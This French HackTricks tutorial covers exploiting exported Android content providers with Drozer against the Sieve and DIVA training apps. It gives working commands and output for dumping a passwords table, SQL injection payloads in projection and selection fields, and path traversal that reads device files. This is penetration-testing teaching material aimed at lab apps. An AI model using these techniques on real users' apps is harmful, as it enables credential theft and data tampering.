Exploiter les fournisseurs de contenu

Reading time: 6 minutes

Exploiter les fournisseurs de contenu

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks

Intro

Les données sont fournies d'une application à d'autres sur demande par un composant connu sous le nom de fournisseur de contenu. Ces demandes sont gérées par les méthodes de la classe ContentResolver. Les fournisseurs de contenu peuvent stocker leurs données à divers endroits, tels qu'une base de données, des fichiers ou sur un réseau.

Dans le fichier Manifest.xml, la déclaration du fournisseur de contenu est requise. Par exemple :

xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

Pour accéder à content://com.mwr.example.sieve.DBContentProvider/Keys, la permission READ_KEYS est nécessaire. Il est intéressant de noter que le chemin /Keys/ est accessible dans la section suivante, qui n'est pas protégée en raison d'une erreur du développeur, qui a sécurisé /Keys mais a déclaré /Keys/.

Peut-ĂȘtre pouvez-vous accĂ©der Ă  des donnĂ©es privĂ©es ou exploiter une vulnĂ©rabilitĂ© (Injection SQL ou TraversĂ©e de chemin).

Obtenir des informations à partir de content providers exposés

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

Il est possible de reconstituer comment atteindre le DBContentProvider en commençant les URIs par “content://”. Cette approche est basĂ©e sur des informations obtenues en utilisant Drozer, oĂč des informations clĂ©s Ă©taient situĂ©es dans le /Keys rĂ©pertoire.

Drozer peut deviner et essayer plusieurs URIs :

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

Vous devriez Ă©galement vĂ©rifier le code ContentProvider pour rechercher des requĂȘtes :

De plus, si vous ne trouvez pas de requĂȘtes complĂštes, vous pourriez vĂ©rifier quels noms sont dĂ©clarĂ©s par le ContentProvider dans la mĂ©thode onCreate :

La requĂȘte sera comme : content://name.of.package.class/declared_name

Content Providers basés sur une base de données

Probablement, la plupart des Content Providers sont utilisĂ©s comme interface pour une base de donnĂ©es. Par consĂ©quent, si vous pouvez y accĂ©der, vous pourriez ĂȘtre en mesure d'extraire, mettre Ă  jour, insĂ©rer et supprimer des informations.
Vérifiez si vous pouvez accéder à des informations sensibles ou essayez de les modifier pour contourner les mécanismes d'autorisation.

En vérifiant le code du Content Provider, regardez également les fonctions nommées comme : query, insert, update et delete :

Parce que vous serez en mesure de les appeler

Interroger le contenu

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Insérer du contenu

En interrogeant la base de données, vous apprendrez le nom des colonnes, puis vous pourrez insérer des données dans la DB :

Remarque que dans l'insertion et la mise Ă  jour, vous pouvez utiliser --string pour indiquer une chaĂźne, --double pour indiquer un double, --float, --integer, --long, --short, --boolean

Mettre Ă  jour le contenu

En connaissant le nom des colonnes, vous pourriez également modifier les entrées :

Supprimer le contenu

Injection SQL

Il est simple de tester l'injection SQL (SQLite) en manipulant les champs de projection et de sélection qui sont passés au fournisseur de contenu.
Lors de l'interrogation du fournisseur de contenu, il y a 2 arguments intéressants pour rechercher des informations : --selection et --projection :

Vous pouvez essayer d'abuser de ces paramĂštres pour tester les injections SQL :

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

DĂ©couverte automatique des injections SQL par Drozer

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

Fournisseurs de contenu basés sur le systÚme de fichiers

Les fournisseurs de contenu peuvent Ă©galement ĂȘtre utilisĂ©s pour accĂ©der aux fichiers :

Lire le fichier

Vous pouvez lire des fichiers Ă  partir du fournisseur de contenu.

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Traversal de chemin

Si vous pouvez accéder à des fichiers, vous pouvez essayer d'abuser d'un Traversal de chemin (dans ce cas, ce n'est pas nécessaire, mais vous pouvez essayer d'utiliser "../" et des astuces similaires).

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Découverte automatique de la traversée de chemin par Drozer

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

Références

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks